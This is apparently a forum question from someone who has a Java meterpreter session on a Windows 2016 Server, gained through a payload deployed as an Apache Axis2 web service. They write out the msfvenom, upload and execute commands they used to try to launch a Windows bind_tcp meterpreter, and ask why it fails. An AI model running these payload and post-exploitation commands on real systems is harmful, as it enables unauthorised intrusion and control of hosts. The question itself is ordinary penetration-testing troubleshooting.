I've managed to get a meterpreter session running between my Kali Linux and Windows 2016 Server by uploading a payload as an Apache Axis2 web service.
I want to change to a windows meterpreter(in order to use windows exploits). I tried creating new .exe payloads with msfvenom and uploaded and executed them through the java meterpreter session. But I'm not able to get a new Windows meterpreter running.
This is what I've tried:
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe > bindtcp5555.exe
meterpreter> upload /root/bindtcp5555.exe
...
[*] uploaded : bindtcp5555.exe -> bindtcp5555.exe
meterpreter > execute -f bindtcp5555.exe -m
Process created.
So I can upload and execute the payload but when I check running processes it's not in the list and my metasploit handler can't establish a session with tcp bind.
What am I doing wrong?